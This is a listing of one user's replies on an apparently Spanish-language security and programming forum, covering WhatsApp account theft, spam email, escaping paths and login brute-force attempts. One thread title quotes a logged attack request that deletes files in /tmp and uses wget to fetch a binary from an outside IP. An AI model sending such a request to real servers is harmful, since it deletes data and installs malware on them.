|
1621
|
Programación / Scripting / Re: Script con pinta de spiware
|
en: 7 Enero 2021, 01:20 am
|
Hola compañeros, las doble barras inversas en la ruta de Windows deben ir porque una sola barra es una secuencia de escape, entonces al llevar dos barras inversas significa que se está escapando un carácter y ese carácter es el mismo de la secuencia de escape, es de decir la \ por eso se utilizan las dobles \\
Saludos
|
|
|
1623
|
Seguridad Informática / Nivel Web / Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
|
en: 6 Enero 2021, 14:11 pm
|
Hola, con el tema de intentos de login es como dice drvy!, asignas una IP pública y levantas un servidor y ya aparecen los intentos de login, pero a éstos habría que hacerles una trampa bastante interesante e ingeniosa, algo que sirve perfectamente para intentos de login o brute force.
Cuál es el objetivo de la fuerza bruta a un sistema? o que es lo que quieren hacer cuando intentan loguearse con algún nombre de usuario del servidor? Es justamente obtener el acceso correcto para ingresar, pero, después de ingresar que es lo que pasa con esos intentos?, simplemente dejan de seguir, dejan de insistir porque obviamente ya consiguieron el acceso.
Lo que se podría hacer es darle ok a todo, cuando un sistema detecta esos intentos, lo que hace es aceptar los login como si fuesen correctos, les hace una trampa y cuando el atacante cree que ya tiene el acceso, simplemente es falso, no lo tiene, pero su sistema automatizado (el del atacante) no sirve para nada, porque todo lo que intente es correcto aunque obviamente son logins falso y no le va a dar acceso de nada, pero de esta forma el atacante queda confundido y se va a dar cuenta de esa medida de seguridad, y que terminara haciendo? abandonando el sitio... lo mismo si es algo automatizado, al aceptar cualquier login ese bot/script se detendrá y los intentos también.
Es un método posiblemente más seguro cuando otros sistemas rechazan todo el tiempo esos miles de login, pero de ésta forma los acepta y los hace creer que tienen acceso cuando en realidad no lo tienen y así no pueden saber cuál es el login correcto, es como los scanners de puertos que pueden hacer creer (que aparezcan abiertos) a los atacantes o sistemas automatizados que x puertos están abiertos cuando verdaderamente están cerrados.
Saludos
|
|
|
1624
|
Seguridad Informática / Hacking / Re: troyano en imagen para un iphone
|
en: 4 Enero 2021, 17:11 pm
|
Hola, a quién estás tratando de rastrear?, sabías que si haces eso de forma ilegal vas a tener serios problemas legales?, de la misma forma que vos querés rastrear a esa persona, de la misma forma te van a rastrear a vos y van a ponerte cargos como los siguientes:
Invasión a la privacidad Daños y perjuicios Robo de datos Violación a la seguridad social y privada Distribución de información Daño moral
Te animas a eso?
Saludos
|
|
|
1625
|
Programación / Programación C/C++ / Re: Duda C++
|
en: 4 Enero 2021, 16:47 pm
|
Hola,
La lista de los lenguajes de programación más usados
1 - Java. 2 - Lenguaje C. 3 - Python. 4 - Lenguaje C++ 5 - C# 6 - javascript. 7 - PHP. 8 - Swift.
Fuente Google
Saludos
|
|
|
1626
|
Seguridad Informática / Seguridad / Re: Implementar medidas de seguridad y anti spam de solicitudes!
|
en: 4 Enero 2021, 16:42 pm
|
Hola, a Whatsapp le falta lo de bloqueo de llamadas, es decir en ajustes debería haber opciones sobre las llamadas, pero no existen esas opciones..... por lo que todas las llamadas siempre pueden entrar excepto que el número esté bloqueado.
Ahora vos tenés un problema win_7 porque vos no querés que te llamen números desconocidos, pero si te interesan alguno de ellos... entonces? cómo hacemos en tu caso? De todas maneras si existirían opciones en WhatsApp de bloqueo de llamadas, tendrías que decirte que hacer, o bien aceptar todas las llamadas entrantes de números desconocidos o bien no aceptar ninguna.
Saludos
|
|
|
1628
|
Seguridad Informática / Seguridad / Re: Robo de identidad whatsapp
|
en: 30 Diciembre 2020, 22:25 pm
|
Si estas o estuviste dentro de un grupo de WhatsApp ya estás compartiendo tu número..... eso quiere decir que esa persona no inventó tu número, además que le puede haber interesado tu número por alguna razón y no solo por molestar, por ejemplo porque algo hayas enviado por el grupo o por otra razón. Por otro lado no entiendo porque mencionas tanto lo de "alta tecnología" si nos comentas lo siguiente: también trate de denunciarlo en la policía de alta tecnología de mi pais y son unos pésimos en servicio, que son unos pésimos en servicio, entonces no entiendo porque decís tanto que son de alta tecnología si piensas/crees o estas seguro que son unos pesimos, es contradictorio. Es por ejemplo como que una persona maneje un auto de alta gama y ni siquiera sepa manejar, entonces no sirve de nada tener un auto así. Saludos
|
|
|
1629
|
Seguridad Informática / Seguridad / Re: Robo de identidad whatsapp
|
en: 29 Diciembre 2020, 17:32 pm
|
Hola, yo creo que esa persona te tiene agendado en WhatsApp y desde ahí te tiene controlando mirando lo que hacés, si estás o no en línea, cuando fue la última vez que estuviste conectado, si instalaste recientemente WhatsApp, si lo tienes instalado a Whatsapp o no, esta persona o bien está verificado esos datos manualmente o bien lo hace de forma automá ya sea con un bot, script o program, pero seguro que te tiene controlando por ese lado, porque debe saber tus movimientos en tu cuenta de WhatsApp, y espera que caigas en la trampa para robarte tu cuenta.
Como podes solucionar lo que te acabo de comentar? Yo en tu lugar configuro la privacidad de WhatsApp para restringir todos esos datos, última vez activo, foto de perfil y la info.
Ya le entendí el método que usa esta persona, lo que hace es enviar el código de verificación para que WhatsApp te lo envíe por SMS, pero a su vez él también lo hace y ahí quedas con la duda de cuál es el SMS original de WhatsApp, para que caigas en la trampa y como dijo el brujo, te robe tu cuenta.
Saludos
|
|
|
1630
|
Programación / Desarrollo Web / Re: correos sin sentido ... ¿que finalidad tiene?
|
en: 29 Diciembre 2020, 13:30 pm
|
Otra que pueden hacer es quererte saturar el servicio de email, razón? Para que tengas demoras/lag en recibir otros correos o para que tú hosting te suspenda el servicio por exceso del servicio, suele pasar que lo hacen para que el hosting suspenda o cancele la cuenta ya que esa cuenta les está dando problemas.
Si un cliente de ellos está siendo atacado, ellos van a preferir que se vaya, así terminan con el problema, y en algunos casos, ellos te cancelan la cuenta, o dicho en otras palabras, te echan.
Saludos
|
|
|
|
|
|
|